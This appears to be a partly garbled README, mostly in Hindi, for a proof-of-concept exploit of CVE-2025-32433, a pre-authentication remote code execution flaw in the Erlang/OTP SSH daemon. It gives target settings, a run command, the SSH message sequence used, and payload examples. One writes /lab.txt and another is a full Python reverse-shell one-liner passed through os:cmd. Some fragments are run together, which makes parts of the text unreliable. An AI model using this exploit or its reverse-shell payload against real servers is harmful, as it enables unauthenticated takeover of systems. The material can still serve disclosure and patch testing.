
CVE-2025-32433 के लिए प्रमाण-अवधारणा शोषण, जो Erlang/OTP SSH डेमॉन में प्रमाणीकरण-पूर्व RCE है। इसमें Python स्क्रिप्ट शामिल है जो तैयार किए गए SSH चैनल अनुरोध भेजती है और मनमाना कमांड निष्पादित करती है।
CVE-2025-32433 एक रिमोट कोड निष्पादन (RCE) भेद्यता है जो Erlang/OTP SSH डेमॉन को प्रभावित करती है।
इसका मूल कारण पूर्व-प्रमाणीकरण SSH चैनल अनुरोधों का अनुचित संचालन है, जिसे हमलावर द्वारा
प्रमाणीकरण से पहले मनमाने कमांड निष्पादन के लिए तैयार किया जा सकता है।
शामिल PoC ऐसे तैयार किए गए SSH पैकेट भेजने का प्रदर्शन करता है; डिफ़ॉल्ट रूप से यह लक्ष्य पर /lab.txt लिखता है लेकिन इसे अन्य कमांड के लिए अनुकूलित किया जा सकता है।
HOST = "127.0.0.1" # Target IP
PORT = 2222 # Target SSH port
python3 cve-2025-32433.py
डिफ़ॉल्ट रूप से यह /lab.txt बनाता है जिसमें होता है।
अपने स्वयं के कमांड चलाने के लिए में पेलोड को संशोधित करें।
pwnedbuild_channel_request# Write a file file:write_file("/lab.txt", <<"pwned">>).Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")
SSH_MSG_KEXINIT भेजता है।exec पेलोड के साथ SSH_MSG_CHANNEL_OPEN और SSH_MSG_CHANNEL_REQUEST भेजता है।खोज और लेखन मैट कीली (प्लेटफ़ॉर्म सिक्योरिटी) द्वारा। PoC प्रकाशित करने और विवरण साझा करने के लिए उनका धन्यवाद।